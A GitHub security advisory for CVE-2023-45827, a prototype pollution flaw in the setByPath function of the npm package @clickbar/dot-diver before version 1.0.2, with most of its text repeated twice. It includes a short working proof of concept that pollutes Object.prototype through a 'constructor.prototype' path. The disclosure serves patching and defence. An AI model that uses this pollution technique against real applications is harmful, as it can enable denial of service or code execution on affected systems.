Headline
GHSA-9w5f-mw3p-pj47: Prototype Pollution(PP) vulnerability in setByPath
Summary
There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.
Details
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
In this code, there is no validation for Prototpye Pollution.
PoC
import { getByPath, setByPath } from '@clickbar/dot-diver'
console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
Impact
It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.
Credits
Team : NodeBoB
최지혁 ( Jihyeok Choi )
이동하 ( Lee Dong Ha of ZeroPointer Lab )
강성현 ( kang seonghyeun )
박성진 ( sungjin park )
김찬호 ( Chanho Kim )
이수영 ( Lee Su Young )
김민욱 ( MinUk Kim )
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2023-45827
Prototype Pollution(PP) vulnerability in setByPath
High severity GitHub Reviewed Published Nov 2, 2023 in clickbar/dot-diver • Updated Nov 3, 2023
Package
npm @clickbar/dot-diver (npm)
Affected versions
< 1.0.2
Summary
There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.
Details
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access objectToSet[lastKey] = value
In this code, there is no validation for Prototpye Pollution.
PoC
import { getByPath, setByPath } from ‘@clickbar/dot-diver’
console.log({}.polluted); // undefined setByPath({},’constructor.prototype.polluted’, ‘foo’); console.log({}.polluted); // foo
Impact
It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.
Credits
Team : NodeBoB
최지혁 ( Jihyeok Choi )
이동하 ( Lee Dong Ha of ZeroPointer Lab )
강성현 ( kang seonghyeun )
박성진 ( sungjin park )
김찬호 ( Chanho Kim )
이수영 ( Lee Su Young )
김민욱 ( MinUk Kim )
References
- GHSA-9w5f-mw3p-pj47
- clickbar/dot-diver@9790834
Published to the GitHub Advisory Database
Nov 3, 2023
Related news
Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation. In versions prior to 1.0.2 there is a Prototype Pollution vulnerability in the `setByPath` function which can leads to remote code execution (RCE). This issue has been addressed in commit `98daf567` which has been included in release 1.0.2. Users are advised to upgrade. There are no known workarounds to this vulnerability.